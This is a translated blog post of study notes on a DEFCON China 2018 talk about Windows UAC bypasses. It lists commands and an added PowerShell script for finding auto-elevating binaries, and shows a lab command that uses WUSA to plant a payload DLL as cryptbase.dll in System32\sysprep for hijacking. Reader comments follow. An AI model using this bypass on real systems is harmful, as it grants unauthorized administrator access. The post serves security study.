DEFCON2018 CHINA(part:0x01)
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmXSVyBXMSmuej4ZyvRNNFvMNzKTnDbQ8n6edYcNqU69ik/11111.png" alt="11111.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmXSVyBXMSmuej4ZyvRNNFvMNzKTnDbQ8n6edYcNqU69ik/11111.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmXSVyBXMSmuej4ZyvRNNFvMNzKTnDbQ8n6edYcNqU69ik/11111.png 2x" />
<p dir="auto">The DEFCON CHINA trip ended two days ago, and I finally have time to dig into the material the big names shared.
<p dir="auto">What I am studying this time is the content presented by Ruben Boonen (b33f).
<p dir="auto"><a href="https://github.com/FuzzySecurity" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">His GitHub</a>
<p dir="auto">b33f's talk this time is:<br />
UAC 0day, all day!<br />
(User Account Control: every day is a 0day.)
<h4>0x01: Some basic concepts
<p dir="auto"><a href="https://en.wikipedia.org/wiki/User_Account_Control" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">User Account Control</a>
<p dir="auto"><a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">AppLocker</a>
<p dir="auto"><a href="https://github.com/FuzzySecurity" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">All the scripts can be found here</a>
<h4>0x02: What the scripts used here do
<p dir="auto">Most of the scripts are PowerShell-based; my environment is Windows 7 x64:
<p dir="auto"><em>Get-TokenPrivs.ps1</em>
<pre><code>Get-TokenPrivs -ProcID 3052</code></pre>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmRNzi7xDDqYFR9FgYUSrvJR38ZN5VhDHAc5UjKzFyeNkj/1112.png" alt="1112.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmRNzi7xDDqYFR9FgYUSrvJR38ZN5VhDHAc5UjKzFyeNkj/1112.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmRNzi7xDDqYFR9FgYUSrvJR38ZN5VhDHAc5UjKzFyeNkj/1112.png 2x" />
<p dir="auto">Running it gives the output shown above. What it does is:
<p dir="auto">open a handle to the process and call Advapi32::GetTokenInformation to list the privileges associated with the process's token.
<p dir="auto">The following scripts were also used this time. They are all used in a similar way, and many tools offer similar functionality, so I will not go through them one by one:
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmY2beQtApaxKpnNfpD5M74WceVFP4Tx2uXmgcKqVxdENr/1113.png" alt="1113.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmY2beQtApaxKpnNfpD5M74WceVFP4Tx2uXmgcKqVxdENr/1113.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmY2beQtApaxKpnNfpD5M74WceVFP4Tx2uXmgcKqVxdENr/1113.png 2x" />
<h4>0x03: Finding auto-elevating binaries with Get-AutoElevate
<p dir="auto">There are many ways to do this, for example with strings.exe (Sysinternals Strings):
<pre><code>strings.exe -s *.exe | findstr /i "autoElevate"</code></pre>
<p dir="auto"><a href="https://technet.microsoft.com/zh-cn/library/2009.07.uac.aspx" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">Some usage notes are here</a>
<p dir="auto">You can also use Sigcheck.exe to inspect a specific file, or use PowerShell's built-in cmdlets:
<pre><code>C:\Users\evil0x00\Desktop\0Day\0Day\DefCon-Tools>sigcheck64.exe -m c:\Windows\system32\taskmgr.exe</code></pre>
<p dir="auto">or:
<pre><code>Get-Content -Path C:\Windows\System32\Taskmgr.exe | Select-String -Pattern "autoElevate"</code></pre>
<p dir="auto">The speaker also provides a script for this:
<p dir="auto"><em>Get-AutoElevate.ps1</em>
<pre><code>Get-AutoElevate -Path C:\Windows\System32\ -MaxDepth 1</code></pre>
<p dir="auto">The query results are as follows:
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmWJSiG5YoQNHP8YK3MDwJzzy6dCxpiE8YxZXALqUtwDhv/1114.png" alt="1114.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmWJSiG5YoQNHP8YK3MDwJzzy6dCxpiE8YxZXALqUtwDhv/1114.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmWJSiG5YoQNHP8YK3MDwJzzy6dCxpiE8YxZXALqUtwDhv/1114.png 2x" />
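<p dir="auto">As an added example (my own code, not the speaker's Get-AutoElevate.ps1 and not from the original post), the PowerShell below parses each executable's embedded application manifest instead of grepping for the bare string, so a binary that merely contains the text "autoElevate" somewhere is not reported, and it records the requested execution level and Authenticode status next to the flag. The function name and parameters are my own; it assumes PowerShell 3.0 or later.

```powershell
# Added example, not the speaker's Get-AutoElevate.ps1: parse the embedded
# application manifest of each .exe instead of grepping for the bare string,
# so only binaries that really declare <autoElevate>true</autoElevate> are listed.
# Assumes PowerShell 3.0 or later (for [pscustomobject] and -File).
function Find-AutoElevateManifest {
    param(
        [string]$Path = "$env:SystemRoot\System32",
        [int]$MaxDepth = 1   # 0 = only files directly under $Path
    )
    $base       = (Resolve-Path -LiteralPath $Path).ProviderPath.TrimEnd('\')
    $manifestRx = [regex]'(?is)<assembly\b.*?</assembly>'
    $autoRx     = [regex]'(?i)<autoElevate>\s*(true|false)\s*</autoElevate>'
    $levelRx    = [regex]'(?i)<requestedExecutionLevel\b[^>]*\blevel\s*=\s*"([^"]+)"'
    # Latin-1 keeps a 1:1 byte-to-char mapping, so the ASCII manifest inside the
    # PE resource section can be matched with a plain regex over the file text.
    $latin1 = [System.Text.Encoding]::GetEncoding(28591)

    Get-ChildItem -LiteralPath $base -Filter *.exe -Recurse -File -ErrorAction SilentlyContinue |
      ForEach-Object {
        # Depth relative to $Path: '' -> 0, '\wbem' -> 1, and so on
        $rel   = $_.DirectoryName.Substring($base.Length)
        $depth = @($rel -split '\\' | Where-Object { $_ }).Count
        if ($depth -gt $MaxDepth) { return }
        try { $text = [System.IO.File]::ReadAllText($_.FullName, $latin1) } catch { return }
        $m = $manifestRx.Match($text)
        if (-not $m.Success) { return }
        $auto = $autoRx.Match($m.Value)
        if (-not ($auto.Success -and $auto.Groups[1].Value -eq 'true')) { return }
        $level = $levelRx.Match($m.Value)
        # autoElevate is only honoured for Windows-signed binaries in secure
        # locations, so the signature status is worth recording next to the flag.
        [pscustomobject]@{
            Path      = $_.FullName
            Level     = if ($level.Success) { $level.Groups[1].Value } else { 'n/a' }
            Signature = (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status
        }
      }
}

Find-AutoElevateManifest -Path "$env:SystemRoot\System32" -MaxDepth 1 | Format-Table -AutoSize
```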
<h4>0x04 Bypassing UAC to create a file
<p dir="auto">This one is bypassed via WUSA.
<p dir="auto">Normally, creating a new file in this directory is not allowed; you have to elevate to administrator. As shown below:
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVdPY6RaV14GReco3EoRtwCJtStvKe2qohe5VWGZPjBKp/sysprep.png" alt="sysprep.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVdPY6RaV14GReco3EoRtwCJtStvKe2qohe5VWGZPjBKp/sysprep.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVdPY6RaV14GReco3EoRtwCJtStvKe2qohe5VWGZPjBKp/sysprep.png 2x" />
<p dir="auto">Run the script the speaker provided directly, as follows:
<pre><code>=========================================[Lab1 - WUSA]
- Filter: NAME NOT FOUND, High Integrity, Path end in ".dll"
- Elevated-WUSA -Payload C:\DefCon-Tools\Yamabiko\yamabiko-x64.dll -DestinationPath C:\Windows\System32\sysprep\ -DestinationName cryptbase.dll</code></pre>
<p dir="auto">The output is as follows:
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmTG2hEAxXG1JYD3VGVCiXkDtwxr2US4zLks7wtqXzT9Fm/1.png" alt="1.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmTG2hEAxXG1JYD3VGVCiXkDtwxr2US4zLks7wtqXzT9Fm/1.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmTG2hEAxXG1JYD3VGVCiXkDtwxr2US4zLks7wtqXzT9Fm/1.png 2x" />
<p dir="auto">You can see that the DLL was created successfully and the file was written.
<h4>0x05
<p dir="auto">That is all for this time; the rest will be in the next article.
The "couldn't afford a ticket" series
Just kidding
666
em...
The company gave me a ticket, but it was too far so I didn't go
Missed a good opportunity
Wanted to go, no ticket
Next time
Wow, I went too
Let's meet up next time